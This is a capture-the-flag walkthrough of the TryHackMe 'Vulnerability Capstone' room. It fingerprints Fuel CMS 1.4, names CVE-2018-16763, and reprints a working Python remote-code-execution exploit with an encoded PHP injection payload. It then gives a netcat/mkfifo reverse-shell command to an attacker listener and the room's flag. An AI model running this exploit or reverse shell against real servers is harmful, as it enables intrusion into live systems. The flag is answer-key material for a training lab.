Home Vulnerability Capstone
Post
Cancel

Vulnerability Capstone

THM Room https://tryhackme.com/room/vulnerabilitycapstone

TASK 1 : Introduction

Let’s get hacking

No Answer

TASK 2 : Exploit the Machine (Flag Submission)

Deploy the vulnerable machine attached to this task & wait five minutes before visiting the vulnerable machine.

No Answer

What is the name of the application running on the vulnerable machine ?

Here is what we get when going to the ip adress :

Fuel CMS Fuel CMS

Answer : Fuel CMS

What is the version number of this application ?

Answer : 1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application? Format: CVE-XXXX-XXXXX

Googling the application Fuel CMS 1.4 give us the CVE for RCE.

Answer : CVE-2018-16763

Use the resources & skills learnt throughout this module to find and use a relevant exploit to exploit this vulnerability. Note: There are numerous exploits out there that can be used for this vulnerability (some more useful than others!)

I Search for CVE-2018-16763 on google and i got a python3 script https://gist.github.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2 for this RCE :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

# Updated by Krishna Upadhyay for Python 3

import requests
import urllib


url = "http://10.0.2.29/structure/index.php"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    # xxxx = raw_input('cmd:') # python 2
    xxxx = input('cmd:') # python 3
    # quoted_xxxx = urllib.quote(xxxx) # python 2
    quoted_xxxx = urllib.parse.quote(xxxx) # python 3
    full_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quoted_xxxx+"%27%29%2b%27"
    # proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(full_url) #, proxies=proxy)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    # print r.text[0:dup] # python 2
    # print(r.text[0:dup]) # python 3
    t = r.text[0:dup]
    div_position = t.find("<div ")
    print(t[0:div_position])

No Answer

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

From the script found above, i just need to rewrite the URL in my case http://10.10.98.161 and set up a listener on port 8888 for example before launching the script. We get a command prompt waiting input where we need to set the command to ask a shell :

1
2
root@ip-10-10-121-248:~/Desktop# python3 exploit.py
cmd:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.121.248 8888 >/tmp/f

Then we have on the listener side :

1
2
3
4
5
6
root@ip-10-10-121-248:~/Desktop# nc -lnvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from 10.10.98.161 35362 received!
/bin/sh: 0: can't access tty; job control turned off
$ cat /home/ubuntu/flag.txt
THM{ACKME_BLOG_HACKED}

Answer : THM{ACKME_BLOG_HACKED}

This post is licensed under CC BY 4.0 by the author.